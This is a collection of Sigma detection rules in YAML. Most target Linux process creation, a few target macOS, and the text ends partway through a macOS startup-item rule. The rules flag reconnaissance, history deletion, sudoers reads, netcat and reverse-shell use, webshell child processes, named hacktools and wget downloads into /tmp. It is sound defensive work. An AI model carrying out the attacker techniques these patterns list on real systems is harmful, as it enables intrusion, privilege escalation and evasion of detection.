description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
references:
- https://blog.skyplabs.net/posts/container-detection/
- https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
tags:
- attack.discovery
- attack.t1082
author: Seth Hanford
date: 2023-08-23
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
# Note: add additional tools and utilities to increase coverage
- '/cat'
- '/dir'
- '/find'
- '/ls'
- '/stat'
- '/test'
- 'grep'
CommandLine|endswith: '.dockerenv'
condition: selection
falsepositives:
- Legitimate system administrator usage of these commands
- Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml
================================================
title: Potentially Suspicious Execution From Tmp Folder
id: 312b42b1-bded-4441-8b58-163a3af58775
status: test
description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
modified: 2025-08-05
tags:
- attack.defense-evasion
- attack.t1036
logsource:
product: linux
category: process_creation
detection:
selection:
Image|startswith: '/tmp/'
filter_optional_nextcloud:
Image|endswith: '/usr/bin/nextcloud'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
================================================
title: Potential Discovery Activity Using Find - Linux
id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
related:
- id: 85de3a19-b675-4a51-bfc6-b11a5186c971
type: similar
status: test
description: Detects usage of "find" binary in a suspicious manner to perform discovery
references:
- https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/find'
CommandLine|contains:
- '-perm -4000'
- '-perm -2000'
- '-perm 0777'
- '-perm -222'
- '-perm -o w'
- '-perm -o x'
- '-perm -u=s'
- '-perm -g=s'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
================================================
title: Suspicious Git Clone - Linux
id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
- https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-05
tags:
- attack.reconnaissance
- attack.t1593.003
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/git'
CommandLine|contains: ' clone '
selection_keyword:
CommandLine|contains:
# Add more suspicious keywords
- 'exploit'
- 'Vulns'
- 'vulnerability'
- 'RCE'
- 'RemoteCodeExecution'
- 'Invoke-'
- 'CVE-'
- 'poc-'
- 'ProofOfConcept'
# Add more vuln names
- 'proxyshell'
- 'log4shell'
- 'eternalblue'
- 'eternal-blue'
- 'MS17-'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
================================================
title: History File Deletion
id: 1182f3b3-e716-4efa-99ab-d2685d04360f
status: test
description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
references:
- https://github.com/sleventyeleven/linuxprivchecker/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: Florian Roth (Nextron Systems)
date: 2022-06-20
modified: 2022-09-15
tags:
- attack.impact
- attack.t1565.001
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/rm'
- '/unlink'
- '/shred'
selection_history:
- CommandLine|contains:
- '/.bash_history'
- '/.zsh_history'
- CommandLine|endswith:
- '_history'
- '.history'
- 'zhistory'
condition: all of selection*
falsepositives:
- Legitimate administration activities
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
================================================
title: Print History File Contents
id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66
status: test
description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
references:
- https://github.com/sleventyeleven/linuxprivchecker/
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: Florian Roth (Nextron Systems)
date: 2022-06-20
modified: 2022-09-15
tags:
- attack.reconnaissance
- attack.t1592.004
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/cat'
- '/head'
- '/tail'
- '/more'
selection_history:
- CommandLine|contains:
- '/.bash_history'
- '/.zsh_history'
- CommandLine|endswith:
- '_history'
- '.history'
- 'zhistory'
condition: all of selection*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml
================================================
title: Linux HackTool Execution
id: a015e032-146d-4717-8944-7a1884122111
status: test
description: Detects known hacktool execution based on image name.
references:
- https://github.com/Gui774ume/ebpfkit
- https://github.com/pathtofile/bad-bpf
- https://github.com/carlospolop/PEASS-ng
- https://github.com/t3l3machus/hoaxshell
- https://github.com/t3l3machus/Villain
- https://github.com/HavocFramework/Havoc
- https://github.com/1N3/Sn1per
- https://github.com/Ne0nd0g/merlin
- https://github.com/Pennyw0rth/NetExec/
author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
date: 2023-01-03
modified: 2024-09-19
tags:
- attack.execution
- attack.resource-development
- attack.t1587
logsource:
product: linux
category: process_creation
detection:
selection_c2_frameworks:
Image|endswith:
- '/crackmapexec'
- '/havoc'
- '/merlin-agent'
- '/merlinServer-Linux-x64'
- '/msfconsole'
- '/msfvenom'
- '/ps-empire server'
- '/ps-empire'
- '/sliver-client'
- '/sliver-server'
- '/Villain.py'
selection_c2_framework_cobaltstrike:
Image|contains:
- '/cobaltstrike'
- '/teamserver'
selection_scanners:
Image|endswith:
- '/autorecon'
- '/httpx'
- '/legion'
- '/naabu'
- '/netdiscover'
- '/nuclei'
- '/recon-ng'
selection_scanners_sniper:
Image|contains: '/sniper'
selection_web_enum:
Image|endswith:
- '/dirb'
- '/dirbuster'
- '/eyewitness'
- '/feroxbuster'
- '/ffuf'
- '/gobuster'
- '/wfuzz'
- '/whatweb'
selection_web_vuln:
Image|endswith:
- '/joomscan'
- '/nikto'
- '/wpscan'
selection_exploit_tools:
Image|endswith:
- '/aircrack-ng'
- '/bloodhound-python'
- '/bpfdos'
- '/ebpfki'
- '/evil-winrm'
- '/hashcat'
- '/hoaxshell.py'
- '/hydra'
- '/john'
- '/ncrack'
# default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest
- '/nxc-ubuntu-latest'
- '/pidhide'
- '/pspy32'
- '/pspy32s'
- '/pspy64'
- '/pspy64s'
- '/setoolkit'
- '/sqlmap'
- '/writeblocker'
selection_linpeas:
# covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases
Image|contains: '/linpeas'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml
================================================
title: Potential Container Discovery Via Inodes Listing
id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8
status: test
description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
references:
- https://blog.skyplabs.net/posts/container-detection/
- https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
tags:
- attack.discovery
- attack.t1082
author: Seth Hanford
date: 2023-08-23
modified: 2025-11-24
logsource:
category: process_creation
product: linux
detection:
selection_ls_img:
Image|endswith: '/ls' # inode outside containers low, inside high
selection_ls_cli:
- CommandLine|endswith: ' /'
- CommandLine|contains: ' / '
selection_regex_inode:
CommandLine|re: '(?:\s-[^-\s]{0,20}i|\s--inode\s)' # -i finds inode number
selection_regex_dir:
CommandLine|re: '(?:\s-[^-\s]{0,20}d|\s--directory\s)' # -d gets directory itself, not contents
condition: all of selection_*
falsepositives:
- Legitimate system administrator usage of these commands
- Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
================================================
title: Interactive Bash Suspicious Children
id: ea3ecad2-db86-4a89-ad0b-132a10d2db55
status: test
description: Detects suspicious interactive bash as a parent to rather uncommon child processes
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-14
tags:
- attack.execution
- attack.defense-evasion
- attack.t1059.004
- attack.t1036
logsource:
product: linux
category: process_creation
detection:
selection:
ParentCommandLine: 'bash -i'
anomaly1:
CommandLine|contains:
- '-c import '
- 'base64'
- 'pty.spawn'
anomaly2:
Image|endswith:
- 'whoami'
- 'iptables'
- '/ncat'
- '/nc'
- '/netcat'
condition: selection and 1 of anomaly*
falsepositives:
- Legitimate software that uses these patterns
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
================================================
title: Suspicious Java Children Processes
id: d292e0af-9a18-420c-9525-ec0ac3936892
status: test
description: Detects java process spawning suspicious children
references:
- https://www.tecmint.com/different-types-of-linux-shells/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/java'
CommandLine|contains:
- '/bin/sh'
- 'bash'
- 'dash'
- 'ksh'
- 'zsh'
- 'csh'
- 'fish'
- 'curl'
- 'wget'
- 'python'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml
================================================
title: Linux Network Service Scanning Tools Execution
id: 3e102cd9-a70d-4a7a-9508-403963092f31
status: test
description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
- https://github.com/projectdiscovery/naabu
- https://github.com/Tib3rius/AutoRecon
author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
date: 2020-10-21
modified: 2024-09-19
tags:
- attack.discovery
- attack.t1046
logsource:
category: process_creation
product: linux
detection:
selection_netcat:
Image|endswith:
- '/nc'
- '/ncat'
- '/netcat'
- '/socat'
selection_network_scanning_tools:
Image|endswith:
- '/autorecon'
- '/hping'
- '/hping2'
- '/hping3'
- '/naabu'
- '/nmap'
- '/nping'
- '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning
- '/zenmap'
filter_main_netcat_listen_flag:
CommandLine|contains:
- ' --listen '
- ' -l '
condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
================================================
title: Linux Shell Pipe to Shell
id: 880973f3-9708-491c-a77b-2a35a1921158
status: test
description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-14
modified: 2022-07-26
tags:
- attack.defense-evasion
- attack.t1140
logsource:
product: linux
category: process_creation
detection:
selection:
CommandLine|startswith:
- 'sh -c '
- 'bash -c '
selection_exec:
- CommandLine|contains:
- '| bash '
- '| sh '
- '|bash '
- '|sh '
- CommandLine|endswith:
- '| bash'
- '| sh'
- '|bash'
- ' |sh'
condition: all of selection*
falsepositives:
- Legitimate software that uses these patterns
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml
================================================
title: Access of Sudoers File Content
id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06
status: test
description: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
references:
- https://github.com/sleventyeleven/linuxprivchecker/
author: Florian Roth (Nextron Systems)
date: 2022-06-20
modified: 2025-06-04
tags:
- attack.reconnaissance
- attack.t1592.004
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/cat'
- '/ed'
- '/egrep'
- '/emacs'
- '/fgrep'
- '/grep'
- '/head'
- '/less'
- '/more'
- '/nano'
- '/tail'
CommandLine|contains: ' /etc/sudoers'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml
================================================
title: Linux Recon Indicators
id: 0cf7a157-8879-41a2-8f55-388dd23746b7
status: test
description: Detects events with patterns found in commands used for reconnaissance on linux systems
references:
- https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py
author: Florian Roth (Nextron Systems)
date: 2022-06-20
tags:
- attack.reconnaissance
- attack.t1592.004
- attack.credential-access
- attack.t1552.001
logsource:
category: process_creation
product: linux
detection:
selection:
CommandLine|contains:
- ' -name .htpasswd'
- ' -perm -4000 '
condition: selection
falsepositives:
- Legitimate administration activities
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml
================================================
title: Potential Suspicious Change To Sensitive/Critical Files
id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4
status: test
description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
references:
- https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
author: '@d4ns4n_ (Wuerth-Phoenix)'
date: 2023-05-30
tags:
- attack.impact
- attack.t1565.001
logsource:
category: process_creation
product: linux
detection:
selection_img_1:
Image|endswith:
- '/cat'
- '/echo'
- '/grep'
- '/head'
- '/more'
- '/tail'
CommandLine|contains: '>'
selection_img_2:
Image|endswith:
- '/emacs'
- '/nano'
- '/sed'
- '/vi'
- '/vim'
selection_paths:
CommandLine|contains:
- '/bin/login'
- '/bin/passwd'
- '/boot/'
- '/etc/*.conf'
- '/etc/cron.' # Covers different cron config files "daily", "hourly", etc.
- '/etc/crontab'
- '/etc/hosts'
- '/etc/init.d'
- '/etc/sudoers'
- '/opt/bin/'
- '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'
- '/usr/bin/'
- '/usr/local/bin/'
condition: 1 of selection_img_* and selection_paths
falsepositives:
- Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
================================================
title: Shell Execution Of Process Located In Tmp Directory
id: 2fade0b6-7423-4835-9d4f-335b39b83867
status: test
description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.execution
logsource:
product: linux
category: process_creation
detection:
selection:
ParentImage|startswith: '/tmp/'
Image|endswith:
- '/bash'
- '/csh'
- '/dash'
- '/fish'
- '/ksh'
- '/sh'
- '/zsh'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
================================================
title: Execution Of Script Located In Potentially Suspicious Directory
id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7
status: test
description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.execution
logsource:
product: linux
category: process_creation
detection:
selection_img:
Image|endswith:
- '/bash'
- '/csh'
- '/dash'
- '/fish'
- '/ksh'
- '/sh'
- '/zsh'
selection_flag:
CommandLine|contains: ' -c '
selection_paths:
# Note: Add more suspicious paths
CommandLine|contains: '/tmp/'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml
================================================
title: System Information Discovery
id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239
status: stable
description: Detects system information discovery commands
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md
author: Ömer Günal, oscd.community
date: 2020-10-08
modified: 2021-09-14
tags:
- attack.discovery
- attack.t1082
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/uname'
- '/hostname'
- '/uptime'
- '/lspci'
- '/dmidecode'
- '/lscpu'
- '/lsmod'
condition: selection
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml
================================================
title: System Network Connections Discovery - Linux
id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79
status: test
description: Detects usage of system utilities to discover system network connections
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020-10-19
modified: 2023-01-17
tags:
- attack.discovery
- attack.t1049
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith:
- '/who'
- '/w'
- '/last'
- '/lsof'
- '/netstat'
filter_landscape_sysinfo:
ParentCommandLine|contains: '/usr/bin/landscape-sysinfo'
Image|endswith: '/who'
condition: selection and not 1 of filter_*
falsepositives:
- Legitimate activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml
================================================
title: System Network Discovery - Linux
id: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa
status: test
description: Detects enumeration of local network configuration
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md
author: Ömer Günal and remotephone, oscd.community
date: 2020-10-06
modified: 2022-09-15
tags:
- attack.discovery
- attack.t1016
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith:
- '/firewall-cmd'
- '/ufw'
- '/iptables'
- '/netstat'
- '/ss'
- '/ip'
- '/ifconfig'
- '/systemd-resolve'
- '/route'
selection_cli:
CommandLine|contains: '/etc/resolv.conf'
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml
================================================
title: Mask System Power Settings Via Systemctl
id: c172b7b5-f3a1-4af2-90b7-822c63df86cb
status: experimental
description: |
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.
Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.
This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.
author: Milad Cheraghi, Nasreddine Bencherchali
date: 2025-10-17
references:
- https://www.man7.org/linux/man-pages/man1/systemctl.1.html
- https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/
tags:
- attack.persistence
- attack.impact
- attack.t1653
logsource:
category: process_creation
product: linux
detection:
selection_systemctl:
Image|endswith: '/systemctl'
CommandLine|contains: ' mask'
selection_power_options:
CommandLine|contains:
- 'suspend.target'
- 'hibernate.target'
- 'hybrid-sleep.target'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_touch_susp.yml
================================================
title: Touch Suspicious Service File
id: 31545105-3444-4584-bebf-c466353230d2
status: test
description: Detects usage of the "touch" process in service file.
references:
- https://blogs.blackberry.com/
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-11
tags:
- attack.defense-evasion
- attack.t1070.006
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/touch'
CommandLine|contains: ' -t '
CommandLine|endswith: '.service'
condition: selection
falsepositives:
- Admin changing date of files.
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml
================================================
title: Triple Cross eBPF Rootkit Execve Hijack
id: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e
status: test
description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
references:
- https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-05
tags:
- attack.defense-evasion
- attack.privilege-escalation
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/sudo'
CommandLine|contains: 'execve_hijack'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml
================================================
title: Triple Cross eBPF Rootkit Install Commands
id: 22236d75-d5a0-4287-bf06-c93b1770860f
status: test
description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
references:
- https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-05
tags:
- attack.defense-evasion
- attack.t1014
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/sudo'
CommandLine|contains|all:
- ' tc '
- ' enp0s3 '
CommandLine|contains:
- ' qdisc '
- ' filter '
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_userdel.yml
================================================
title: User Has Been Deleted Via Userdel
id: 08f26069-6f80-474b-8d1f-d971c6fedea0
status: test
description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
references:
- https://linuxize.com/post/how-to-delete-group-in-linux/
- https://www.cyberciti.biz/faq/linux-remove-user-command/
- https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
- https://linux.die.net/man/8/userdel
author: Tuan Le (NCSGroup)
date: 2022-12-26
tags:
- attack.impact
- attack.t1531
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/userdel'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml
================================================
title: User Added To Root/Sudoers Group Using Usermod
id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73
status: test
description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
references:
- https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
- https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
author: TuanLe (GTSC)
date: 2022-12-21
tags:
- attack.privilege-escalation
- attack.persistence
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/usermod'
CommandLine|contains:
- '-aG root'
- '-aG sudoers'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml
================================================
title: Vim GTFOBin Abuse - Linux
id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea
status: test
description: |
Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/vim/
- https://gtfobins.github.io/gtfobins/rvim/
- https://gtfobins.github.io/gtfobins/vimdiff/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-28
modified: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith:
- '/rvim'
- '/vim'
- '/vimdiff'
CommandLine|contains:
- ' --cmd'
- ' -c '
selection_cli:
CommandLine|contains:
- ':!/'
- ':lua '
- ':py '
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml
================================================
title: Linux Webshell Indicators
id: 818f7b24-0fba-4c49-a073-8b755573b9c7
status: test
description: Detects suspicious sub processes of web server processes
references:
- https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/
- https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-10-15
modified: 2022-12-28
tags:
- attack.persistence
- attack.t1505.003
logsource:
product: linux
category: process_creation
detection:
selection_general:
ParentImage|endswith:
- '/httpd'
- '/lighttpd'
- '/nginx'
- '/apache2'
- '/node'
- '/caddy'
selection_tomcat:
ParentCommandLine|contains|all:
- '/bin/java'
- 'tomcat'
selection_websphere: # ? just guessing
ParentCommandLine|contains|all:
- '/bin/java'
- 'websphere'
sub_processes:
Image|endswith:
- '/whoami'
- '/ifconfig'
- '/ip'
- '/bin/uname'
- '/bin/cat'
- '/bin/crontab'
- '/hostname'
- '/iptables'
- '/netstat'
- '/pwd'
- '/route'
condition: 1 of selection_* and sub_processes
falsepositives:
- Web applications that invoke Linux command line tools
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml
================================================
title: Download File To Potentially Suspicious Directory Via Wget
id: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4
status: test
description: Detects the use of wget to download content to a suspicious directory
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/wget'
selection_output:
- CommandLine|re: '\s-O\s' # We use regex to ensure a case sensitive argument detection
- CommandLine|contains: '--output-document'
selection_path:
CommandLine|contains: '/tmp/'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml
================================================
title: Potential Xterm Reverse Shell
id: 4e25af4b-246d-44ea-8563-e42aacab006b
status: test
description: Detects usage of "xterm" as a potential reverse shell tunnel
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-24
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: 'xterm'
CommandLine|contains: '-display'
CommandLine|endswith: ':1'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/macos/file_event/file_event_macos_emond_launch_daemon.yml
================================================
title: MacOS Emond Launch Daemon
id: 23c43900-e732-45a4-8354-63e4a6c187ce
status: test
description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md
- https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
author: Alejandro Ortuno, oscd.community
date: 2020-10-23
modified: 2021-11-27
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.014
logsource:
category: file_event
product: macos
detection:
selection_1:
TargetFilename|contains: '/etc/emond.d/rules/'
TargetFilename|endswith: '.plist'
selection_2:
TargetFilename|contains: '/private/var/db/emondClients/'
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/macos/file_event/file_event_macos_susp_startup_item_created.yml
================================================
title: Startup Item File Created - MacOS
id: dfe8b941-4e54-4242-b674-6b613d521962
status: test
description: |
Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
Adversaries may use startup items automatically executed at boot initialization to establish persistence.
Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md
